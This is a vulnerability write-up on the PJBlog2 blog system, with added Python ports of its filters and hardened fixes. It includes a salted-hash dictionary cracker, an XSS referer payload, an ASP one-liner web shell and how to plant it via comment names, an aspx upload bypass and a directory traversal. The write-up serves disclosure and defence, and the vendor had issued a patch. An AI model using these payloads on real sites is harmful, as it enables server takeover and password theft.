PJBlog Security Analysis


PJBlog2 is a free ASP + Access personal blog system developed by PuterJam. For the past few days I have wanted a blog to play with, and PJBlog2 has fairly good features and a nice interface. After trying it out I found it decent, but I also found several small security issues, which I write up here. The version analysed is PJBlog2 v2.4.1211, released on December 11, 2005.

I. Cryptographic algorithm
PJBlog2 hashes user passwords with SHA-1 rather than the more common MD5. Like MD5, SHA-1 is a one-way hash function; it accepts input of any length and outputs a 160-bit value.
When a new user is created, PJBlog2 generates a random six-character string, the Salt. The user's plaintext password is concatenated with the salt and then hashed to give the stored password: Password = SHA1(user_pwd & Salt). The benefit is that two identical passwords produce different hashes, so a precomputed table of plain SHA-1 hashes is useless, and this slightly non-standard scheme makes the passwords harder to crack.
Harder, however, is not the same as uncrackable: the salt has to be stored next to the hash for login to work, so whoever has the database can still guess each password offline. There is no ready-made tool for this on the Internet, so you have to write one. Since .NET provides SHA1 classes I first wrote it in VB.NET, but I could not get the resource consumption down, so I switched to C. It took me a long time to find a usable C SHA-1 implementation on a foreign site; it is not bad, and anyone interested can look at the CSHA1 class here: http://www.codeproject.com/cpp/csha1.asp
The program can be downloaded here (http://www.0x54.org/lake2/program/PJBlogCracker.exe). It is command-line only, fairly limited, single-threaded and very slow, and probably has bugs; I will fix these problems later.
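To make the scheme concrete, here is an added example (my own code, not PJBlog2's and not the cracker linked above) that computes the salted hash as described, Password = SHA1(user_pwd & Salt), and then runs a dictionary guess against it using the salt an attacker reads from the same database row. The UTF-8 byte encoding and lowercase-hex output are assumptions; the real PJBlog2 code may differ in those details.

```python
import hashlib
import secrets
import string
from typing import Optional

# Assumption (this example only): the stored value is the lowercase hex SHA-1
# of the UTF-8 bytes of password followed by salt, i.e. SHA1(user_pwd & Salt).
SALT_ALPHABET = string.ascii_letters + string.digits


def make_salt(length: int = 6) -> str:
    """Random per-user salt, six characters as in PJBlog2."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def pjblog_hash(password: str, salt: str) -> str:
    """Password = SHA1(user_pwd & Salt)."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def crack(stored_hash: str, salt: str, wordlist) -> Optional[str]:
    """Offline guess with the user's own salt. The salt only defeats
    precomputed tables; a per-user dictionary attack runs at full SHA-1
    speed, one hash per candidate."""
    target = stored_hash.lower()
    for word in wordlist:
        if pjblog_hash(word, salt) == target:
            return word
    return None


# Constructed wordlist for the demonstration (not data from any real site).
WORDLIST = ["123456", "password", "letmein", "qwerty", "admin888"]

if __name__ == "__main__":
    salt = make_salt()
    h = pjblog_hash("letmein", salt)
    # Same password, different user (different salt) -> different hash
    print(pjblog_hash("letmein", make_salt()) != h)
    print(crack(h, salt, WORDLIST))
```

The point to take from it: the salt stops one precomputed table from serving every user, but each user's hash is still only as strong as the password behind it, and SHA-1 gives the attacker no slowdown per guess.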

II. Login authentication
PJBlog2 authenticates users with cookies plus the IP address. On a successful login the system generates a random Hashkey, writes it into the cookies and into the database, and afterwards identifies the user from the Hashkey, Username and IP in the cookies. Cookies are easy to get hold of, through cross-site scripting or from a downloaded database; the IP address is harder, so it would seem there is little chance of cookie spoofing. Well, that is not quite the case.

III. Loose filtering in a few places
The first is the lax filtering of the referer in the access statistics. See:

Guest_Refer = Trim(Request.ServerVariables("HTTP_REFERER"))
Conn.Execute("insert into blog_Counter (coun_IP, coun_OS, coun_Browser, coun_Referer) VALUES ('" & Guest_IP & "', '" & Guest_Browser(1) & "', '" & Guest_Browser(0) & "', '" & CheckStr(Guest_Refer) & "')")

Ha, the referer is only passed through CheckStr. Look at the CheckStr code:

'*************************************
'Filter special characters
'*************************************
Function CheckStr(byVal ChkStr)
    Dim Str: Str = ChkStr
    Str = Trim(Str)
    If IsNull(Str) Then
        CheckStr = ""
        Exit Function
    End If
    ' Ampersand and quotes become HTML entities. The entity strings were
    ' rendered as plain characters on the page and are reconstructed here.
    Str = Replace(Str, "&", "&amp;")
    Str = Replace(Str, "'", "&#39;")
    Str = Replace(Str, """", "&quot;")
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Global = True
    ' SQL keywords are broken up by encoding their second letter as an entity
    re.Pattern = "(w)(here)"
    Str = re.Replace(Str, "$1&#104;ere")
    re.Pattern = "(s)(elect)"
    Str = re.Replace(Str, "$1&#101;lect")
    re.Pattern = "(i)(nsert)"
    Str = re.Replace(Str, "$1&#110;sert")
    re.Pattern = "(c)(reate)"
    Str = re.Replace(Str, "$1&#114;eate")
    re.Pattern = "(d)(rop)"
    Str = re.Replace(Str, "$1&#114;op")
    re.Pattern = "(a)(lter)"
    Str = re.Replace(Str, "$1&#108;ter")
    re.Pattern = "(d)(elete)"
    Str = re.Replace(Str, "$1&#101;lete")
    re.Pattern = "(u)(pdate)"
    Str = re.Replace(Str, "$1&#112;date")
    re.Pattern = "(\s)(or)"
    Str = re.Replace(Str, "$1&#111;r")
    Set re = Nothing
    CheckStr = Str
End Function

Single quotes, double quotes and ampersands are converted, but the most important characters, "<" and ">", are left alone, so the referer can carry a cross-site scripting payload into the statistics page. Note that only the first 40 characters are displayed there.
The second place is the name a visitor enters when commenting, which is also only passed through CheckStr; the name column in the database is limited to 24 characters. That makes XSS harder to construct here, but the field has another use, described in detail below.
Some blog owners disable comments from visitors, so you have to register before commenting. After registration the comment name box is filled with the registered name and made read-only. What then? Submit the form data from outside the site yourself.
The other place is the blog's message-board plug-in, where the user name is again not filtered properly; it is harder to use, with only 20 characters.

IV. Database problems
The default database name in PJBlog2 is pblog.asp. The database contains a blog_Notdownload table that looks like an anti-download measure, but request the database file in the browser and try it: it can be downloaded.
Since it can be downloaded, ASP code written into it will be executed when the file is requested. In some places (such as visitors' comments) the inserted ASP code gets mangled; I do not know why, which is frustrating.
ASP code can be written into the comment name field. As noted above, the filtering there is loose, and ASP stored in the database is not displayed, so all one sees is a nameless user chatting. The payload has to be built carefully: at most 24 characters, and it must be "filtered", that is, come through CheckStr intact. I thought about it and found the shortest one, exactly 24 characters: <%eval request(chr(9))%>
The message-board content can also take ASP code, but the administrator sees it when reading the messages.
Oh, of course most webmasters change the database name, but during testing I still found a few who had not......
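The following added example (mine, not PJBlog2's code) serves both the CheckStr discussion in section III and the database trojan above: it is a Python port of CheckStr, with the entity strings reconstructed as in the listing, used to show that a referer XSS payload and the 24-character ASP one-liner both pass unchanged, beside an output-encoding function that would make them inert. Note why the payload uses chr(9): naming the request parameter with a literal string would need quotes, which CheckStr turns into entities, so a tab character serves as the parameter name instead. The inputs are constructed for the demonstration.

```python
import html
import re

# Port of PJBlog2's CheckStr. The &#NNN; entity strings were rendered as plain
# letters on the page and are reconstructed here (assumption); the logic
# follows the VBScript listing.
_KEYWORD_RULES = [
    (r"(w)(here)", r"\1&#104;ere"),
    (r"(s)(elect)", r"\1&#101;lect"),
    (r"(i)(nsert)", r"\1&#110;sert"),
    (r"(c)(reate)", r"\1&#114;eate"),
    (r"(d)(rop)", r"\1&#114;op"),
    (r"(a)(lter)", r"\1&#108;ter"),
    (r"(d)(elete)", r"\1&#101;lete"),
    (r"(u)(pdate)", r"\1&#112;date"),
    (r"(\s)(or)", r"\1&#111;r"),
]


def check_str(value):
    """Mirror of CheckStr: entity-encode & ' " and break up SQL keywords.
    '<' and '>' are left untouched, which is the whole problem."""
    if value is None:
        return ""
    s = value.strip(" ")  # VBScript Trim removes spaces only
    s = s.replace("&", "&amp;").replace("'", "&#39;").replace('"', "&quot;")
    for pattern, repl in _KEYWORD_RULES:
        s = re.sub(pattern, repl, s, flags=re.IGNORECASE)
    return s


def check_str_hardened(value):
    """Added suggestion, not PJBlog2 code: encode every HTML-significant
    character on output. Keyword mangling is not a SQL injection defence;
    parameterised queries are."""
    if value is None:
        return ""
    return html.escape(value.strip(" "), quote=True)


def passes_unchanged(value, column_limit):
    """True when CheckStr leaves the value intact and it fits the column."""
    return check_str(value) == value and len(value) <= column_limit


# Constructed attack inputs (not captured from any real site).
REFERER_XSS = "<script>alert(1)</script>"  # statistics page shows the first 40 chars
ASP_TROJAN = "<%eval request(chr(9))%>"  # comment name column holds 24 chars

if __name__ == "__main__":
    print(check_str("1' or 1=1"))  # quote and " or" are mangled
    print(passes_unchanged(REFERER_XSS, 40))  # XSS survives
    print(len(ASP_TROJAN), passes_unchanged(ASP_TROJAN, 24))
    print(check_str_hardened(ASP_TROJAN))  # inert once encoded
```

A quoted variant such as <%eval request("c")%> is shorter but fails, because CheckStr rewrites the double quotes; the tab trick is what keeps the payload both quote-free and within 24 characters.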

V. File uploads
For security, PJBlog2 restricts the types of files that can be uploaded: asp, asa, aspx, cer, cdx and htr are blocked. In practice many virtual hosts support not only ASP but also ASPX, PHP and Perl, and formats such as shtml can still be uploaded, so it is best to block every type the server can execute.
The upload code in attachment.asp is as follows:

Dim F_File, F_Type
Set F_File = FileUP.File("File")
' The saved name is built from the raw extension F_File.FileExt ...
F_Name = randomStr(1) & Year(now) & Month(now) & Day(now) & Hour(now) & Minute(now) & Second(now) & "." & F_File.FileExt
' ... but the check below is made on the FixName()-processed copy
F_Type = FixName(F_File.FileExt)
If F_File.FileSize > Int(UP_FileSize) Then
    Response.Write("<div style=""padding:6px""><a href='attachment.asp'>The file is too large; please go back and upload again</a></div>")
ElseIf IsvalidFile(UCase(F_Type)) = False Then
    Response.Write("<div style=""padding:6px""><a href='attachment.asp'>The file format is not allowed; please upload again</a></div>")
Else
    F_File.SaveAs Server.MapPath("attachments/" & D_Name & "/" & F_Name)
    Response.Write "<script>addUploadItem('" & F_Type & "', 'attachments/" & D_Name & "/" & F_Name & "', " & Request.QueryString("MSave") & ")</script>"
    Response.Write("<div style=""padding:6px""><a href='attachment.asp'>Upload successful; please go back to continue uploading</a></div>")
End If

The suffix the file is saved with is F_File.FileExt, but the suffix that is checked is the one processed by FixName(). Here is the FixName definition in function.asp:

'*************************************
'Filter file name
'*************************************
Function FixName(UpFileExt)
    If IsEmpty(UpFileExt) Then Exit Function
    FixName = Ucase(UpFileExt)
    FixName = Replace(FixName, Chr(0), "")
    FixName = Replace(FixName, ".", "")
    ' Plain substring removal, in this order: "ASP" is removed before the
    ' "ASPX" rule is reached, so an ASPX suffix is reduced to "X"
    FixName = Replace(FixName, "ASP", "")
    FixName = Replace(FixName, "ASA", "")
    FixName = Replace(FixName, "ASPX", "")
    FixName = Replace(FixName, "CER", "")
    FixName = Replace(FixName, "CDX", "")
    FixName = Replace(FixName, "HTR", "")
End Function

Ha, so it strips out the dangerous suffixes. If my file's suffix is asp(0x00)gif, the check removes chr(0) and then asp and sees gif, while the file is saved with the raw suffix asp(0x00)gif. In theory that should work, but after a long time trying I could not get it to, which is frustrating; let me know if you can.
However, there is the aspx format. When an aspx file is uploaded, FixName removes "asp" first (the ASPX rule comes after it and never matches), so the checked suffix becomes x. You only need to add x to the allowed upload formats, and then aspx files can be uploaded while still being saved as .aspx.
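An added example (mine, not PJBlog2's code) that ports FixName and the validate-then-save flow above, so the two mismatches can be tested directly: the checked value and the saved value differ, and the ordered substring removal turns aspx into x. IsvalidFile() is not shown on the page, so it is modelled here as an exact allow-list membership test (assumption); the stem of the saved file name is a constructed constant rather than the random-string-plus-timestamp PJBlog2 builds.

```python
DANGEROUS = ("ASP", "ASA", "ASPX", "CER", "CDX", "HTR")


def fix_name(ext):
    """Port of FixName(): uppercase, strip NUL and '.', then remove each
    dangerous suffix by substring replacement in the listed order."""
    if ext is None:
        return None  # IsEmpty -> Exit Function, returns Empty
    s = ext.upper().replace("\x00", "").replace(".", "")
    for bad in DANGEROUS:
        s = s.replace(bad, "")
    return s


def upload_decision(file_ext, allowed_types, stem="A20051211120000"):
    """Mirror of the attachment.asp flow. IsvalidFile() is modelled as an
    exact allow-list match (assumption). Returns the saved file name, or
    None if the upload is rejected."""
    f_type = fix_name(file_ext)
    if f_type is None or f_type.upper() not in allowed_types:
        return None
    # The saved name uses the raw F_File.FileExt, not the checked F_Type.
    return f"{stem}.{file_ext}"


def safe_extension(filename, allowed_types):
    """Hardened replacement (added suggestion): reject NUL bytes, take the
    last extension only, require an exact allow-list match, and return the
    checked value so the caller saves with it rather than the raw input."""
    if "\x00" in filename or "." not in filename:
        return None
    ext = filename.rsplit(".", 1)[1].upper()
    return ext if ext in allowed_types else None


if __name__ == "__main__":
    print(fix_name("aspx"))  # X
    print(fix_name("asp\x00gif"))  # GIF
    print(upload_decision("aspx", {"GIF", "JPG", "X"}))  # saved as .aspx
    print(safe_extension("shell.aspx", {"GIF", "JPG", "X"}))  # None
```

The hardened version never derives the saved name from anything other than the value it checked, which is the actual bug here; the specific strings FixName strips are secondary.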

VI. Attachment management
After logging in, the administrator has an attachment management function, with parameters like http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/month_0512. By specifying AttPath you can browse the web directory.
The system rejects requests submitted from outside the site, so you cannot simply change the URL in the address bar. Instead, find the link-adding function, enter the constructed URL, save it, and click it to view: the request now comes from inside the site and the off-site restriction is bypassed. Note that the program checks the first character of AttPath, which may not be "." or "/", so the traversal has to start inside a real directory. This jumps to the blog root directory: http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/..
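An added example (mine, not PJBlog2's code) modelling the AttPath rule as the text describes it, a first-character check, next to a containment check that resolves the path before deciding. The original check is a reimplementation from the description, not the project's code, and the request values are constructed.

```python
import posixpath


def attpath_check_original(att_path):
    """Model of the rule described in the text: the first character of
    AttPath may not be '.' or '/'. (Reimplemented from the description;
    assumption, not PJBlog2's code.)"""
    return bool(att_path) and att_path[0] not in "./"


def attpath_check_hardened(att_path, base="attachments"):
    """Added suggestion: normalise the path and require that it still lies
    inside the attachments directory. Backslashes and NULs are refused
    outright because Windows also treats '\\' as a separator."""
    if not att_path or "\x00" in att_path or "\\" in att_path:
        return False
    norm = posixpath.normpath(att_path)
    return norm == base or norm.startswith(base + "/")


# Constructed request parameters (not captured from a real site).
NORMAL = "attachments/month_0512"
TRAVERSAL = "attachments/.."  # passes the first-character rule, lists the blog root

if __name__ == "__main__":
    for p in (NORMAL, TRAVERSAL, "../blog", "attachments/month_0512/../.."):
        print(p, attpath_check_original(p), attpath_check_hardened(p))
```

The referer check that the link-list trick bypasses is a separate weakness: a referer only says which page the click came from, and any page on the site the attacker can put a link on satisfies it. Containing the path is what actually stops the directory listing.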

Finally, I hope everyone will support PJBlog2; it really is a useful system. I hope the author keeps at it and makes this blog system even better, to the benefit of many Internet users.
PS: the author is very diligent; the patch is already out.
